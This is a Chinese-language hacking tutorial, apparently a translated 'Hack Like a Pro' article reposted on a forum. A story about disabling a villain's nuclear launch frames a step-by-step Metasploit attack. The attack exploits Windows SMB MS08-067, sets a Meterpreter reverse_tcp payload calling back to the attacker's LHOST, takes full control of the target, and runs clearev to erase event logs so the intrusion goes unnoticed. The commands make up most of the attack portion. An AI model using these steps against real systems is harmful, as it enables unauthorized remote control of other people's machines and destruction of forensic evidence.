掩盖浏览痕迹不会被发现的方法

BY OCCUPYTHEWEB
 05/27/2016 3:26 AM
HACK LIKE A PRO
拯救世界免于核毁灭。世人也许不知道你做了什么，但我知道。棒极了!

 ![图片描述](upload/attach/201904/840827_P4UKZR5ZFGS2WKX.png)

既然我们进入了这个恶毒者的电脑，暂时切断了他的核发射能力，我们还必须想方设法掩盖我们的踪迹，让坏蛋以及坏蛋的爪牙无法追踪到我们的善行。
在这次对黑客攻击中，我们将再次进入他的电脑，植入检测仪，并从他的日志文件中删除我们在那里的全部痕迹。启动metasploit，开始删除我们在坏蛋的电脑上的证据。

步骤1 .再次破坏他的系统

从最初侵入坏蛋电脑的相同攻击开始:

exploit/windows/smb/ms08_067_netapi
但是我们不使用VNC有效载荷，而是使用Meterpreter有效载荷。
类型:

msf> use exploit/windows/smb/ms08_067_netapi

 ![图片描述](upload/attach/201904/840827_K6CXREE6X33JCZ9.png)

在开始操作之前，让我们进一步了解一下这个漏洞类型:

msf exploit(ms08_067_netapi) info
这应该会带来下面的截图提供一些关于这个漏洞的基本信息。可以看到，这种攻击利用了netapi dll中的一个解析缺陷。通过这种方式，可以将我们自己的有效载荷放在系统上，在本例中是Meterpreter。

 ![图片描述](upload/attach/201904/840827_63E42EETK3WSYDS.png)

输入以下命令来加载负载:
msf exploit(ms08_067_netapi) set PAYLOAD windows/meterpreter/reverse_tcp
现在已经有了漏洞和有效负载集，然后需要设置选项。在这种情况下，需要设置LHOST(我们为攻击者)和RHOST(被攻击者，坏蛋计算机)的IP地址。只需输入您和他的计算机的IP地址。

 ![图片描述](upload/attach/201904/840827_JDAGUEBTY37WX5A.png)

步骤2 .控制他的电脑

现在我们已经设置好了控制，只需输入:

msf exploit(ms08_067_netapi) exploit
如果成功，应该会在屏幕上看到一个Meterpreter提示符。即现在完全控制了坏蛋的系统!

 ![图片描述](upload/attach/201904/840827_5B3ECBEMUM2ERNZ.png)

在meterpreter提示符下，输入:

meterpreter > clearev
正如在上面的截图中所看到的，这个命令继续清除我们好战的坏蛋计算机上的事件日志，这样他和他的部下就不会知道我们曾经到过那里。如果我们能看到他电脑上的事件日志，我们就能看到所有的事件都被清除了。

 ![图片描述](upload/attach/201904/840827_S46DVXG2CFZ3HMS.png)

这对保护我们被发现是至关重要的，而且我们可以继续访问他的电脑。一旦他们知道有人入侵了他的电脑，他们很可能会采取措施防止我们再次侵入他们的电脑。

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)